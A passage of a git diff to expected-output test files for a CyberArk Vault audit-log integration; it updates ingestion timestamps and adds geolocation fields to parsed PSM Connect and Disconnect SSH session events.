\u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615888216\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 16 03:04:51\",\"IsoTimestamp\":\"2021-03-16T10:04:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615888216\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "300", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log-expected.json index 43602b598e1..4861b30110e 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log-expected.json @@ -84,7 +84,7 @@ "event": { "severity": 2, "duration": 7000000000, - "ingested": "2021-12-09T13:36:49.813714300Z", + "ingested": "2021-12-14T14:42:15.678826962Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.7\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:07;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"admin2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"No Reason\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"Tesla\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"302\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\",\"Station\":\"10.2.0.7\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:07;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"admin2\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"CPMDisabled\",\"Value\":\"No Reason\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Customer\",\"Value\":\"Tesla\"}]}}}}", "code": "302", "kind": "event", @@ -108,10 +108,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -195,7 +204,7 @@ "event": { "severity": 2, "duration": 13000000000, - "ingested": "2021-12-09T13:36:49.813723Z", + "ingested": "2021-12-14T14:42:15.678829402Z", "original": "\u003c5\u003e1 2021-03-11T17:38:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:26\",\"IsoTimestamp\":\"2021-03-11T17:38:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -219,10 +228,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -306,7 +324,7 @@ "event": { "severity": 2, "duration": 11000000000, - "ingested": "2021-12-09T13:36:49.813728600Z", + "ingested": "2021-12-14T14:42:15.678829917Z", "original": "\u003c5\u003e1 2021-03-11T17:47:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:47:01\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:47:01Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:47:01\",\"IsoTimestamp\":\"2021-03-11T17:47:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -330,10 +348,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -417,7 +444,7 @@ "event": { "severity": 2, "duration": 12000000000, - "ingested": "2021-12-09T13:36:49.813781400Z", + "ingested": "2021-12-14T14:42:15.678830339Z", "original": "\u003c5\u003e1 2021-03-11T17:48:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:40\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:40Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:40\",\"IsoTimestamp\":\"2021-03-11T17:48:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -441,10 +468,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -528,7 +564,7 @@ "event": { "severity": 2, "duration": 12000000000, - "ingested": "2021-12-09T13:36:49.813790600Z", + "ingested": "2021-12-14T14:42:15.678830734Z", "original": "\u003c5\u003e1 2021-03-11T17:55:02Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:55:02\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:55:02Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:55:02\",\"IsoTimestamp\":\"2021-03-11T17:55:02Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -552,10 +588,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -639,7 +684,7 @@ "event": { "severity": 2, "duration": 12000000000, - "ingested": "2021-12-09T13:36:49.813796Z", + "ingested": "2021-12-14T14:42:15.678831318Z", "original": "\u003c5\u003e1 2021-03-11T17:56:42Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:56:42\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:56:42Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n 